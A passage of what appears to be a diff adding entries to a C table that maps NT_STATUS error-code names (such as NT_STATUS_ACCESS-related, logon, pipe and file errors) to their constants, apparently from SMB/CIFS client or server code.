++	{"NT_STATUS_BAD_STACK", NT_STATUS_BAD_STACK},
++	{"NT_STATUS_INVALID_UNWIND_TARGET",
++	 NT_STATUS_INVALID_UNWIND_TARGET},
++	{"NT_STATUS_NOT_LOCKED", NT_STATUS_NOT_LOCKED},
++	{"NT_STATUS_PARITY_ERROR", NT_STATUS_PARITY_ERROR},
++	{"NT_STATUS_UNABLE_TO_DECOMMIT_VM",
++	 NT_STATUS_UNABLE_TO_DECOMMIT_VM},
++	{"NT_STATUS_NOT_COMMITTED", NT_STATUS_NOT_COMMITTED},
++	{"NT_STATUS_INVALID_PORT_ATTRIBUTES",
++	 NT_STATUS_INVALID_PORT_ATTRIBUTES},
++	{"NT_STATUS_PORT_MESSAGE_TOO_LONG",
++	 NT_STATUS_PORT_MESSAGE_TOO_LONG},
++	{"NT_STATUS_INVALID_PARAMETER_MIX",
++	 NT_STATUS_INVALID_PARAMETER_MIX},
++	{"NT_STATUS_INVALID_QUOTA_LOWER", NT_STATUS_INVALID_QUOTA_LOWER},
++	{"NT_STATUS_DISK_CORRUPT_ERROR", NT_STATUS_DISK_CORRUPT_ERROR},
++	{"NT_STATUS_OBJECT_NAME_INVALID", NT_STATUS_OBJECT_NAME_INVALID},
++	{"NT_STATUS_OBJECT_NAME_NOT_FOUND",
++	 NT_STATUS_OBJECT_NAME_NOT_FOUND},
++	{"NT_STATUS_OBJECT_NAME_COLLISION",
++	 NT_STATUS_OBJECT_NAME_COLLISION},
++	{"NT_STATUS_HANDLE_NOT_WAITABLE", NT_STATUS_HANDLE_NOT_WAITABLE},
++	{"NT_STATUS_PORT_DISCONNECTED", NT_STATUS_PORT_DISCONNECTED},
++	{"NT_STATUS_DEVICE_ALREADY_ATTACHED",
++	 NT_STATUS_DEVICE_ALREADY_ATTACHED},
++	{"NT_STATUS_OBJECT_PATH_INVALID", NT_STATUS_OBJECT_PATH_INVALID},
++	{"NT_STATUS_OBJECT_PATH_NOT_FOUND",
++	 NT_STATUS_OBJECT_PATH_NOT_FOUND},
++	{"NT_STATUS_OBJECT_PATH_SYNTAX_BAD",
++	 NT_STATUS_OBJECT_PATH_SYNTAX_BAD},
++	{"NT_STATUS_DATA_OVERRUN", NT_STATUS_DATA_OVERRUN},
++	{"NT_STATUS_DATA_LATE_ERROR", NT_STATUS_DATA_LATE_ERROR},
++	{"NT_STATUS_DATA_ERROR", NT_STATUS_DATA_ERROR},
++	{"NT_STATUS_CRC_ERROR", NT_STATUS_CRC_ERROR},
++	{"NT_STATUS_SECTION_TOO_BIG", NT_STATUS_SECTION_TOO_BIG},
++	{"NT_STATUS_PORT_CONNECTION_REFUSED",
++	 NT_STATUS_PORT_CONNECTION_REFUSED},
++	{"NT_STATUS_INVALID_PORT_HANDLE", NT_STATUS_INVALID_PORT_HANDLE},
++	{"NT_STATUS_SHARING_VIOLATION", NT_STATUS_SHARING_VIOLATION},
++	{"NT_STATUS_QUOTA_EXCEEDED", NT_STATUS_QUOTA_EXCEEDED},
++	{"NT_STATUS_INVALID_PAGE_PROTECTION",
++	 NT_STATUS_INVALID_PAGE_PROTECTION},
++	{"NT_STATUS_MUTANT_NOT_OWNED", NT_STATUS_MUTANT_NOT_OWNED},
++	{"NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED",
++	 NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED},
++	{"NT_STATUS_PORT_ALREADY_SET", NT_STATUS_PORT_ALREADY_SET},
++	{"NT_STATUS_SECTION_NOT_IMAGE", NT_STATUS_SECTION_NOT_IMAGE},
++	{"NT_STATUS_SUSPEND_COUNT_EXCEEDED",
++	 NT_STATUS_SUSPEND_COUNT_EXCEEDED},
++	{"NT_STATUS_THREAD_IS_TERMINATING",
++	 NT_STATUS_THREAD_IS_TERMINATING},
++	{"NT_STATUS_BAD_WORKING_SET_LIMIT",
++	 NT_STATUS_BAD_WORKING_SET_LIMIT},
++	{"NT_STATUS_INCOMPATIBLE_FILE_MAP",
++	 NT_STATUS_INCOMPATIBLE_FILE_MAP},
++	{"NT_STATUS_SECTION_PROTECTION", NT_STATUS_SECTION_PROTECTION},
++	{"NT_STATUS_EAS_NOT_SUPPORTED", NT_STATUS_EAS_NOT_SUPPORTED},
++	{"NT_STATUS_EA_TOO_LARGE", NT_STATUS_EA_TOO_LARGE},
++	{"NT_STATUS_NONEXISTENT_EA_ENTRY", NT_STATUS_NONEXISTENT_EA_ENTRY},
++	{"NT_STATUS_NO_EAS_ON_FILE", NT_STATUS_NO_EAS_ON_FILE},
++	{"NT_STATUS_EA_CORRUPT_ERROR", NT_STATUS_EA_CORRUPT_ERROR},
++	{"NT_STATUS_FILE_LOCK_CONFLICT", NT_STATUS_FILE_LOCK_CONFLICT},
++	{"NT_STATUS_LOCK_NOT_GRANTED", NT_STATUS_LOCK_NOT_GRANTED},
++	{"NT_STATUS_DELETE_PENDING", NT_STATUS_DELETE_PENDING},
++	{"NT_STATUS_CTL_FILE_NOT_SUPPORTED",
++	 NT_STATUS_CTL_FILE_NOT_SUPPORTED},
++	{"NT_STATUS_UNKNOWN_REVISION", NT_STATUS_UNKNOWN_REVISION},
++	{"NT_STATUS_REVISION_MISMATCH", NT_STATUS_REVISION_MISMATCH},
++	{"NT_STATUS_INVALID_OWNER", NT_STATUS_INVALID_OWNER},
++	{"NT_STATUS_INVALID_PRIMARY_GROUP",
++	 NT_STATUS_INVALID_PRIMARY_GROUP},
++	{"NT_STATUS_NO_IMPERSONATION_TOKEN",
++	 NT_STATUS_NO_IMPERSONATION_TOKEN},
++	{"NT_STATUS_CANT_DISABLE_MANDATORY",
++	 NT_STATUS_CANT_DISABLE_MANDATORY},
++	{"NT_STATUS_NO_LOGON_SERVERS", NT_STATUS_NO_LOGON_SERVERS},
++	{"NT_STATUS_NO_SUCH_LOGON_SESSION",
++	 NT_STATUS_NO_SUCH_LOGON_SESSION},
++	{"NT_STATUS_NO_SUCH_PRIVILEGE", NT_STATUS_NO_SUCH_PRIVILEGE},
++	{"NT_STATUS_PRIVILEGE_NOT_HELD", NT_STATUS_PRIVILEGE_NOT_HELD},
++	{"NT_STATUS_INVALID_ACCOUNT_NAME", NT_STATUS_INVALID_ACCOUNT_NAME},
++	{"NT_STATUS_USER_EXISTS", NT_STATUS_USER_EXISTS},
++	{"NT_STATUS_NO_SUCH_USER", NT_STATUS_NO_SUCH_USER},
++	{"NT_STATUS_GROUP_EXISTS", NT_STATUS_GROUP_EXISTS},
++	{"NT_STATUS_NO_SUCH_GROUP", NT_STATUS_NO_SUCH_GROUP},
++	{"NT_STATUS_MEMBER_IN_GROUP", NT_STATUS_MEMBER_IN_GROUP},
++	{"NT_STATUS_MEMBER_NOT_IN_GROUP", NT_STATUS_MEMBER_NOT_IN_GROUP},
++	{"NT_STATUS_LAST_ADMIN", NT_STATUS_LAST_ADMIN},
++	{"NT_STATUS_WRONG_PASSWORD", NT_STATUS_WRONG_PASSWORD},
++	{"NT_STATUS_ILL_FORMED_PASSWORD", NT_STATUS_ILL_FORMED_PASSWORD},
++	{"NT_STATUS_PASSWORD_RESTRICTION", NT_STATUS_PASSWORD_RESTRICTION},
++	{"NT_STATUS_LOGON_FAILURE", NT_STATUS_LOGON_FAILURE},
++	{"NT_STATUS_ACCOUNT_RESTRICTION", NT_STATUS_ACCOUNT_RESTRICTION},
++	{"NT_STATUS_INVALID_LOGON_HOURS", NT_STATUS_INVALID_LOGON_HOURS},
++	{"NT_STATUS_INVALID_WORKSTATION", NT_STATUS_INVALID_WORKSTATION},
++	{"NT_STATUS_PASSWORD_EXPIRED", NT_STATUS_PASSWORD_EXPIRED},
++	{"NT_STATUS_ACCOUNT_DISABLED", NT_STATUS_ACCOUNT_DISABLED},
++	{"NT_STATUS_NONE_MAPPED", NT_STATUS_NONE_MAPPED},
++	{"NT_STATUS_TOO_MANY_LUIDS_REQUESTED",
++	 NT_STATUS_TOO_MANY_LUIDS_REQUESTED},
++	{"NT_STATUS_LUIDS_EXHAUSTED", NT_STATUS_LUIDS_EXHAUSTED},
++	{"NT_STATUS_INVALID_SUB_AUTHORITY",
++	 NT_STATUS_INVALID_SUB_AUTHORITY},
++	{"NT_STATUS_INVALID_ACL", NT_STATUS_INVALID_ACL},
++	{"NT_STATUS_INVALID_SID", NT_STATUS_INVALID_SID},
++	{"NT_STATUS_INVALID_SECURITY_DESCR",
++	 NT_STATUS_INVALID_SECURITY_DESCR},
++	{"NT_STATUS_PROCEDURE_NOT_FOUND", NT_STATUS_PROCEDURE_NOT_FOUND},
++	{"NT_STATUS_INVALID_IMAGE_FORMAT", NT_STATUS_INVALID_IMAGE_FORMAT},
++	{"NT_STATUS_NO_TOKEN", NT_STATUS_NO_TOKEN},
++	{"NT_STATUS_BAD_INHERITANCE_ACL", NT_STATUS_BAD_INHERITANCE_ACL},
++	{"NT_STATUS_RANGE_NOT_LOCKED", NT_STATUS_RANGE_NOT_LOCKED},
++	{"NT_STATUS_DISK_FULL", NT_STATUS_DISK_FULL},
++	{"NT_STATUS_SERVER_DISABLED", NT_STATUS_SERVER_DISABLED},
++	{"NT_STATUS_SERVER_NOT_DISABLED", NT_STATUS_SERVER_NOT_DISABLED},
++	{"NT_STATUS_TOO_MANY_GUIDS_REQUESTED",
++	 NT_STATUS_TOO_MANY_GUIDS_REQUESTED},
++	{"NT_STATUS_GUIDS_EXHAUSTED", NT_STATUS_GUIDS_EXHAUSTED},
++	{"NT_STATUS_INVALID_ID_AUTHORITY", NT_STATUS_INVALID_ID_AUTHORITY},
++	{"NT_STATUS_AGENTS_EXHAUSTED", NT_STATUS_AGENTS_EXHAUSTED},
++	{"NT_STATUS_INVALID_VOLUME_LABEL", NT_STATUS_INVALID_VOLUME_LABEL},
++	{"NT_STATUS_SECTION_NOT_EXTENDED", NT_STATUS_SECTION_NOT_EXTENDED},
++	{"NT_STATUS_NOT_MAPPED_DATA", NT_STATUS_NOT_MAPPED_DATA},
++	{"NT_STATUS_RESOURCE_DATA_NOT_FOUND",
++	 NT_STATUS_RESOURCE_DATA_NOT_FOUND},
++	{"NT_STATUS_RESOURCE_TYPE_NOT_FOUND",
++	 NT_STATUS_RESOURCE_TYPE_NOT_FOUND},
++	{"NT_STATUS_RESOURCE_NAME_NOT_FOUND",
++	 NT_STATUS_RESOURCE_NAME_NOT_FOUND},
++	{"NT_STATUS_ARRAY_BOUNDS_EXCEEDED",
++	 NT_STATUS_ARRAY_BOUNDS_EXCEEDED},
++	{"NT_STATUS_FLOAT_DENORMAL_OPERAND",
++	 NT_STATUS_FLOAT_DENORMAL_OPERAND},
++	{"NT_STATUS_FLOAT_DIVIDE_BY_ZERO", NT_STATUS_FLOAT_DIVIDE_BY_ZERO},
++	{"NT_STATUS_FLOAT_INEXACT_RESULT", NT_STATUS_FLOAT_INEXACT_RESULT},
++	{"NT_STATUS_FLOAT_INVALID_OPERATION",
++	 NT_STATUS_FLOAT_INVALID_OPERATION},
++	{"NT_STATUS_FLOAT_OVERFLOW", NT_STATUS_FLOAT_OVERFLOW},
++	{"NT_STATUS_FLOAT_STACK_CHECK", NT_STATUS_FLOAT_STACK_CHECK},
++	{"NT_STATUS_FLOAT_UNDERFLOW", NT_STATUS_FLOAT_UNDERFLOW},
++	{"NT_STATUS_INTEGER_DIVIDE_BY_ZERO",
++	 NT_STATUS_INTEGER_DIVIDE_BY_ZERO},
++	{"NT_STATUS_INTEGER_OVERFLOW", NT_STATUS_INTEGER_OVERFLOW},
++	{"NT_STATUS_PRIVILEGED_INSTRUCTION",
++	 NT_STATUS_PRIVILEGED_INSTRUCTION},
++	{"NT_STATUS_TOO_MANY_PAGING_FILES",
++	 NT_STATUS_TOO_MANY_PAGING_FILES},
++	{"NT_STATUS_FILE_INVALID", NT_STATUS_FILE_INVALID},
++	{"NT_STATUS_ALLOTTED_SPACE_EXCEEDED",
++	 NT_STATUS_ALLOTTED_SPACE_EXCEEDED},
++	{"NT_STATUS_INSUFFICIENT_RESOURCES",
++	 NT_STATUS_INSUFFICIENT_RESOURCES},
++	{"NT_STATUS_DFS_EXIT_PATH_FOUND", NT_STATUS_DFS_EXIT_PATH_FOUND},
++	{"NT_STATUS_DEVICE_DATA_ERROR", NT_STATUS_DEVICE_DATA_ERROR},
++	{"NT_STATUS_DEVICE_NOT_CONNECTED", NT_STATUS_DEVICE_NOT_CONNECTED},
++	{"NT_STATUS_DEVICE_POWER_FAILURE", NT_STATUS_DEVICE_POWER_FAILURE},
++	{"NT_STATUS_FREE_VM_NOT_AT_BASE", NT_STATUS_FREE_VM_NOT_AT_BASE},
++	{"NT_STATUS_MEMORY_NOT_ALLOCATED", NT_STATUS_MEMORY_NOT_ALLOCATED},
++	{"NT_STATUS_WORKING_SET_QUOTA", NT_STATUS_WORKING_SET_QUOTA},
++	{"NT_STATUS_MEDIA_WRITE_PROTECTED",
++	 NT_STATUS_MEDIA_WRITE_PROTECTED},
++	{"NT_STATUS_DEVICE_NOT_READY", NT_STATUS_DEVICE_NOT_READY},
++	{"NT_STATUS_INVALID_GROUP_ATTRIBUTES",
++	 NT_STATUS_INVALID_GROUP_ATTRIBUTES},
++	{"NT_STATUS_BAD_IMPERSONATION_LEVEL",
++	 NT_STATUS_BAD_IMPERSONATION_LEVEL},
++	{"NT_STATUS_CANT_OPEN_ANONYMOUS", NT_STATUS_CANT_OPEN_ANONYMOUS},
++	{"NT_STATUS_BAD_VALIDATION_CLASS", NT_STATUS_BAD_VALIDATION_CLASS},
++	{"NT_STATUS_BAD_TOKEN_TYPE", NT_STATUS_BAD_TOKEN_TYPE},
++	{"NT_STATUS_BAD_MASTER_BOOT_RECORD",
++	 NT_STATUS_BAD_MASTER_BOOT_RECORD},
++	{"NT_STATUS_INSTRUCTION_MISALIGNMENT",
++	 NT_STATUS_INSTRUCTION_MISALIGNMENT},
++	{"NT_STATUS_INSTANCE_NOT_AVAILABLE",
++	 NT_STATUS_INSTANCE_NOT_AVAILABLE},
++	{"NT_STATUS_PIPE_NOT_AVAILABLE", NT_STATUS_PIPE_NOT_AVAILABLE},
++	{"NT_STATUS_INVALID_PIPE_STATE", NT_STATUS_INVALID_PIPE_STATE},
++	{"NT_STATUS_PIPE_BUSY", NT_STATUS_PIPE_BUSY},
++	{"NT_STATUS_ILLEGAL_FUNCTION", NT_STATUS_ILLEGAL_FUNCTION},
++	{"NT_STATUS_PIPE_DISCONNECTED", NT_STATUS_PIPE_DISCONNECTED},
++	{"NT_STATUS_PIPE_CLOSING", NT_STATUS_PIPE_CLOSING},
++	{"NT_STATUS_PIPE_CONNECTED", NT_STATUS_PIPE_CONNECTED},
++	{"NT_STATUS_PIPE_LISTENING", NT_STATUS_PIPE_LISTENING},
++	{"NT_STATUS_INVALID_READ_MODE", NT_STATUS_INVALID_READ_MODE},
++	{"NT_STATUS_IO_TIMEOUT", NT_STATUS_IO_TIMEOUT},
++	{"NT_STATUS_FILE_FORCED_CLOSED", NT_STATUS_FILE_FORCED_CLOSED},
++	{"NT_STATUS_PROFILING_NOT_STARTED",
++	 NT_STATUS_PROFILING_NOT_STARTED},
++	{"NT_STATUS_PROFILING_NOT_STOPPED",
++	 NT_STATUS_PROFILING_NOT_STOPPED},
++	{"NT_STATUS_COULD_NOT_INTERPRET", NT_STATUS_COULD_NOT_INTERPRET},
++	{"NT_STATUS_FILE_IS_A_DIRECTORY", NT_STATUS_FILE_IS_A_DIRECTORY},
++	{"NT_STATUS_NOT_SUPPORTED", NT_STATUS_NOT_SUPPORTED},
++	{"NT_STATUS_REMOTE_NOT_LISTENING", NT_STATUS_REMOTE_NOT_LISTENING},
++	{"NT_STATUS_DUPLICATE_NAME", NT_STATUS_DUPLICATE_NAME},
++	{"NT_STATUS_BAD_NETWORK_PATH", NT_STATUS_BAD_NETWORK_PATH},
++	{"NT_STATUS_NETWORK_BUSY", NT_STATUS_NETWORK_BUSY},
++	{"NT_STATUS_DEVICE_DOES_NOT_EXIST",
++	 NT_STATUS_DEVICE_DOES_NOT_EXIST},
++	{"NT_STATUS_TOO_MANY_COMMANDS", NT_STATUS_TOO_MANY_COMMANDS},
++	{"NT_STATUS_ADAPTER_HARDWARE_ERROR",
++	 NT_STATUS_ADAPTER_HARDWARE_ERROR},
++	{"NT_STATUS_INVALID_NETWORK_RESPONSE",
++	 NT_STATUS_INVALID_NETWORK_RESPONSE},
++	{"NT_STATUS_UNEXPECTED_NETWORK_ERROR",
++	 NT_STATUS_UNEXPECTED_NETWORK_ERROR},
++	{"NT_STATUS_BAD_REMOTE_ADAPTER", NT_STATUS_BAD_REMOTE_ADAPTER},
++	{"NT_STATUS_PRINT_QUEUE_FULL", NT_STATUS_PRINT_QUEUE_FULL},
++	{"NT_STATUS_NO_SPOOL_SPACE", NT_STATUS_NO_SPOOL_SPACE},
++	{"NT_STATUS_PRINT_CANCELLED", NT_STATUS_PRINT_CANCELLED},
++	{"NT_STATUS_NETWORK_NAME_DELETED", NT_STATUS_NETWORK_NAME_DELETED},
++	{"NT_STATUS_NETWORK_ACCESS_DENIED",
++	 NT_STATUS_NETWORK_ACCESS_DENIED},
++	{"NT_STATUS_BAD_DEVICE_TYPE", NT_STATUS_BAD_DEVICE_TYPE},
++	{"NT_STATUS_BAD_NETWORK_NAME", NT_STATUS_BAD_NETWORK_NAME},
++	{"NT_STATUS_TOO_MANY_NAMES", NT_STATUS_TOO_MANY_NAMES},
++	{"NT_STATUS_TOO_MANY_SESSIONS", NT_STATUS_TOO_MANY_SESSIONS},
++	{"NT_STATUS_SHARING_PAUSED", NT_STATUS_SHARING_PAUSED},
++	{"NT_STATUS_REQUEST_NOT_ACCEPTED", NT_STATUS_REQUEST_NOT_ACCEPTED},
++	{"NT_STATUS_REDIRECTOR_PAUSED", NT_STATUS_REDIRECTOR_PAUSED},
++	{"NT_STATUS_NET_WRITE_FAULT", NT_STATUS_NET_WRITE_FAULT},
++	{"NT_STATUS_PROFILING_AT_LIMIT", NT_STATUS_PROFILING_AT_LIMIT},
++	{"NT_STATUS_NOT_SAME_DEVICE", NT_STATUS_NOT_SAME_DEVICE},
++	{"NT_STATUS_FILE_RENAMED", NT_STATUS_FILE_RENAMED},
++	{"NT_STATUS_VIRTUAL_CIRCUIT_CLOSED",
++	 NT_STATUS_VIRTUAL_CIRCUIT_CLOSED},
++	{"NT_STATUS_NO_SECURITY_ON_OBJECT",
++	 NT_STATUS_NO_SECURITY_ON_OBJECT},
++	{"NT_STATUS_CANT_WAIT", NT_STATUS_CANT_WAIT},
++	{"NT_STATUS_PIPE_EMPTY", NT_STATUS_PIPE_EMPTY},
++	{"NT_STATUS_CANT_ACCESS_DOMAIN_INFO",
++	 NT_STATUS_CANT_ACCESS_DOMAIN_INFO},
++	{"NT_STATUS_CANT_TERMINATE_SELF", NT_STATUS_CANT_TERMINATE_SELF},
++	{"NT_STATUS_INVALID_SERVER_STATE", NT_STATUS_INVALID_SERVER_STATE},
++	{"NT_STATUS_INVALID_DOMAIN_STATE", NT_STATUS_INVALID_DOMAIN_STATE},
++	{"NT_STATUS_INVALID_DOMAIN_ROLE", NT_STATUS_INVALID_DOMAIN_ROLE},
++	{"NT_STATUS_NO_SUCH_DOMAIN", NT_STATUS_NO_SUCH_DOMAIN},
++	{"NT_STATUS_DOMAIN_EXISTS", NT_STATUS_DOMAIN_EXISTS},
++	{"NT_STATUS_DOMAIN_LIMIT_EXCEEDED",
++	 NT_STATUS_DOMAIN_LIMIT_EXCEEDED},
++	{"NT_STATUS_OPLOCK_NOT_GRANTED", NT_STATUS_OPLOCK_NOT_GRANTED},
++	{"NT_STATUS_INVALID_OPLOCK_PROTOCOL",
++	 NT_STATUS_INVALID_OPLOCK_PROTOCOL},
++	{"NT_STATUS_INTERNAL_DB_CORRUPTION",
++	 NT_STATUS_INTERNAL_DB_CORRUPTION},
++	{"NT_STATUS_INTERNAL_ERROR", NT_STATUS_INTERNAL_ERROR},
++	{"NT_STATUS_GENERIC_NOT_MAPPED", NT_STATUS_GENERIC_NOT_MAPPED},
++	{"NT_STATUS_BAD_DESCRIPTOR_FORMAT",
++	 NT_STATUS_BAD_DESCRIPTOR_FORMAT},
++	{"NT_STATUS_INVALID_USER_BUFFER", NT_STATUS_INVALID_USER_BUFFER},
++	{"NT_STATUS_UNEXPECTED_IO_ERROR", NT_STATUS_UNEXPECTED_IO_ERROR},
++	{"NT_STATUS_UNEXPECTED_MM_CREATE_ERR",
++	 NT_STATUS_UNEXPECTED_MM_CREATE_ERR},
++	{"NT_STATUS_UNEXPECTED_MM_MAP_ERROR",
++	 NT_STATUS_UNEXPECTED_MM_MAP_ERROR},
++	{"NT_STATUS_UNEXPECTED_MM_EXTEND_ERR",
++	 NT_STATUS_UNEXPECTED_MM_EXTEND_ERR},
++	{"NT_STATUS_NOT_LOGON_PROCESS", NT_STATUS_NOT_LOGON_PROCESS},
++	{"NT_STATUS_LOGON_SESSION_EXISTS", NT_STATUS_LOGON_SESSION_EXISTS},
++	{"NT_STATUS_INVALID_PARAMETER_1", NT_STATUS_INVALID_PARAMETER_1},
++	{"NT_STATUS_INVALID_PARAMETER_2", NT_STATUS_INVALID_PARAMETER_2},
++	{"NT_STATUS_INVALID_PARAMETER_3", NT_STATUS_INVALID_PARAMETER_3},
++	{"NT_STATUS_INVALID_PARAMETER_4", NT_STATUS_INVALID_PARAMETER_4},
++	{"NT_STATUS_INVALID_PARAMETER_5", NT_STATUS_INVALID_PARAMETER_5},
++	{"NT_STATUS_INVALID_PARAMETER_6", NT_STATUS_INVALID_PARAMETER_6},
++	{"NT_STATUS_INVALID_PARAMETER_7", NT_STATUS_INVALID_PARAMETER_7},
++	{"NT_STATUS_INVALID_PARAMETER_8", NT_STATUS_INVALID_PARAMETER_8},
++	{"NT_STATUS_INVALID_PARAMETER_9", NT_STATUS_INVALID_PARAMETER_9},
++	{"NT_STATUS_INVALID_PARAMETER_10", NT_STATUS_INVALID_PARAMETER_10},
++	{"NT_STATUS_INVALID_PARAMETER_11", NT_STATUS_INVALID_PARAMETER_11},
++	{"NT_STATUS_INVALID_PARAMETER_12", NT_STATUS_INVALID_PARAMETER_12},
++	{"NT_STATUS_REDIRECTOR_NOT_STARTED",
++	 NT_STATUS_REDIRECTOR_NOT_STARTED},
++	{"NT_STATUS_REDIRECTOR_STARTED", NT_STATUS_REDIRECTOR_STARTED},
++	{"NT_STATUS_STACK_OVERFLOW", NT_STATUS_STACK_OVERFLOW},
++	{"NT_STATUS_NO_SUCH_PACKAGE", NT_STATUS_NO_SUCH_PACKAGE},
++	{"NT_STATUS_BAD_FUNCTION_TABLE", NT_STATUS_BAD_FUNCTION_TABLE},
++	{"NT_STATUS_DIRECTORY_NOT_EMPTY", NT_STATUS_DIRECTORY_NOT_EMPTY},
++	{"NT_STATUS_FILE_CORRUPT_ERROR", NT_STATUS_FILE_CORRUPT_ERROR},
++	{"NT_STATUS_NOT_A_DIRECTORY", NT_STATUS_NOT_A_DIRECTORY},
++	{"NT_STATUS_BAD_LOGON_SESSION_STATE",
++	 NT_STATUS_BAD_LOGON_SESSION_STATE},
++	{"NT_STATUS_LOGON_SESSION_COLLISION",
++	 NT_STATUS_LOGON_SESSION_COLLISION},
++	{"NT_STATUS_NAME_TOO_LONG", NT_STATUS_NAME_TOO_LONG},
++	{"NT_STATUS_FILES_OPEN", NT_STATUS_FILES_OPEN},
++	{"NT_STATUS_CONNECTION_IN_USE", NT_STATUS_CONNECTION_IN_USE},
++	{"NT_STATUS_MESSAGE_NOT_FOUND", NT_STATUS_MESSAGE_NOT_FOUND},
++	{"NT_STATUS_PROCESS_IS_TERMINATING",
++	 NT_STATUS_PROCESS_IS_TERMINATING},
++	{"NT_STATUS_INVALID_LOGON_TYPE", NT_STATUS_INVALID_LOGON_TYPE},
++	{"NT_STATUS_NO_GUID_TRANSLATION", NT_STATUS_NO_GUID_TRANSLATION},
++	{"NT_STATUS_CANNOT_IMPERSONATE", NT_STATUS_CANNOT_IMPERSONATE},
++	{"NT_STATUS_IMAGE_ALREADY_LOADED", NT_STATUS_IMAGE_ALREADY_LOADED},
++	{"NT_STATUS_ABIOS_NOT_PRESENT", NT_STATUS_ABIOS_NOT_PRESENT},
++	{"NT_STATUS_ABIOS_LID_NOT_EXIST", NT_STATUS_ABIOS_LID_NOT_EXIST},
++	{"NT_STATUS_ABIOS_LID_ALREADY_OWNED",
++	 NT_STATUS_ABIOS_LID_ALREADY_OWNED},
++	{"NT_STATUS_ABIOS_NOT_LID_OWNER", NT_STATUS_ABIOS_NOT_LID_OWNER},
++	{"NT_STATUS_ABIOS_INVALID_COMMAND",
++	 NT_STATUS_ABIOS_INVALID_COMMAND},
++	{"NT_STATUS_ABIOS_INVALID_LID", NT_STATUS_ABIOS_INVALID_LID},
++	{"NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE",
++	 NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE},
++	{"NT_STATUS_ABIOS_INVALID_SELECTOR",
++	 NT_STATUS_ABIOS_INVALID_SELECTOR},
++	{"NT_STATUS_NO_LDT", NT_STATUS_NO_LDT},
++	{"NT_STATUS_INVALID_LDT_SIZE", NT_STATUS_INVALID_LDT_SIZE},
++	{"NT_STATUS_INVALID_LDT_OFFSET", NT_STATUS_INVALID_LDT_OFFSET},
++	{"NT_STATUS_INVALID_LDT_DESCRIPTOR",
++	 NT_STATUS_INVALID_LDT_DESCRIPTOR},
++	{"NT_STATUS_INVALID_IMAGE_NE_FORMAT",
++	 NT_STATUS_INVALID_IMAGE_NE_FORMAT},
++	{"NT_STATUS_RXACT_INVALID_STATE", NT_STATUS_RXACT_INVALID_STATE},
++	{"NT_STATUS_RXACT_COMMIT_FAILURE", NT_STATUS_RXACT_COMMIT_FAILURE},
++	{"NT_STATUS_MAPPED_FILE_SIZE_ZERO",
++	 NT_STATUS_MAPPED_FILE_SIZE_ZERO},
++	{"NT_STATUS_TOO_MANY_OPENED_FILES",
++	 NT_STATUS_TOO_MANY_OPENED_FILES},
++	{"NT_STATUS_CANCELLED", NT_STATUS_CANCELLED},
++	{"NT_STATUS_CANNOT_DELETE", NT_STATUS_CANNOT_DELETE},
++	{"NT_STATUS_INVALID_COMPUTER_NAME",
++	 NT_STATUS_INVALID_COMPUTER_NAME},
++	{"NT_STATUS_FILE_DELETED", NT_STATUS_FILE_DELETED},
++	{"NT_STATUS_SPECIAL_ACCOUNT", NT_STATUS_SPECIAL_ACCOUNT},
++	{"NT_STATUS_SPECIAL_GROUP", NT_STATUS_SPECIAL_GROUP},
++	{"NT_STATUS_SPECIAL_USER", NT_STATUS_SPECIAL_USER},
++	{"NT_STATUS_MEMBERS_PRIMARY_GROUP",
++	 NT_STATUS_MEMBERS_PRIMARY_GROUP},
++	{"NT_STATUS_FILE_CLOSED", NT_STATUS_FILE_CLOSED},
++	{"NT_STATUS_TOO_MANY_THREADS", NT_STATUS_TOO_MANY_THREADS},
++	{"NT_STATUS_THREAD_NOT_IN_PROCESS",
++	 NT_STATUS_THREAD_NOT_IN_PROCESS},
++	{"NT_STATUS_TOKEN_ALREADY_IN_USE", NT_STATUS_TOKEN_ALREADY_IN_USE},
++	{"NT_STATUS_PAGEFILE_QUOTA_EXCEEDED",
++	 NT_STATUS_PAGEFILE_QUOTA_EXCEEDED},
++	{"NT_STATUS_COMMITMENT_LIMIT", NT_STATUS_COMMITMENT_LIMIT},
++	{"NT_STATUS_INVALID_IMAGE_LE_FORMAT",
++	 NT_STATUS_INVALID_IMAGE_LE_FORMAT},
++	{"NT_STATUS_INVALID_IMAGE_NOT_MZ", NT_STATUS_INVALID_IMAGE_NOT_MZ},
++	{"NT_STATUS_INVALID_IMAGE_PROTECT",
++	 NT_STATUS_INVALID_IMAGE_PROTECT},
++	{"NT_STATUS_INVALID_IMAGE_WIN_16", NT_STATUS_INVALID_IMAGE_WIN_16},
++	{"NT_STATUS_LOGON_SERVER_CONFLICT",
++	 NT_STATUS_LOGON_SERVER_CONFLICT},
++	{"NT_STATUS_TIME_DIFFERENCE_AT_DC",
++	 NT_STATUS_TIME_DIFFERENCE_AT_DC},
++	{"NT_STATUS_SYNCHRONIZATION_REQUIRED",
++	 NT_STATUS_SYNCHRONIZATION_REQUIRED},
++	{"NT_STATUS_DLL_NOT_FOUND", NT_STATUS_DLL_NOT_FOUND},
++	{"NT_STATUS_OPEN_FAILED", NT_STATUS_OPEN_FAILED},
++	{"NT_STATUS_IO_PRIVILEGE_FAILED", NT_STATUS_IO_PRIVILEGE_FAILED},
++	{"NT_STATUS_ORDINAL_NOT_FOUND", NT_STATUS_ORDINAL_NOT_FOUND},
++	{"NT_STATUS_ENTRYPOINT_NOT_FOUND", NT_STATUS_ENTRYPOINT_NOT_FOUND},
++	{"NT_STATUS_CONTROL_C_EXIT", NT_STATUS_CONTROL_C_EXIT},
++	{"NT_STATUS_LOCAL_DISCONNECT", NT_STATUS_LOCAL_DISCONNECT},
++	{"NT_STATUS_REMOTE_DISCONNECT", NT_STATUS_REMOTE_DISCONNECT},
++	{"NT_STATUS_REMOTE_RESOURCES", NT_STATUS_REMOTE_RESOURCES},
++	{"NT_STATUS_LINK_FAILED", NT_STATUS_LINK_FAILED},
++	{"NT_STATUS_LINK_TIMEOUT", NT_STATUS_LINK_TIMEOUT},
++	{"NT_STATUS_INVALID_CONNECTION", NT_STATUS_INVALID_CONNECTION},
++	{"NT_STATUS_INVALID_ADDRESS", NT_STATUS_INVALID_ADDRESS},
++	{"NT_STATUS_DLL_INIT_FAILED", NT_STATUS_DLL_INIT_FAILED},
++	{"NT_STATUS_MISSING_SYSTEMFILE", NT_STATUS_MISSING_SYSTEMFILE},
++	{"NT_STATUS_UNHANDLED_EXCEPTION", NT_STATUS_UNHANDLED_EXCEPTION},
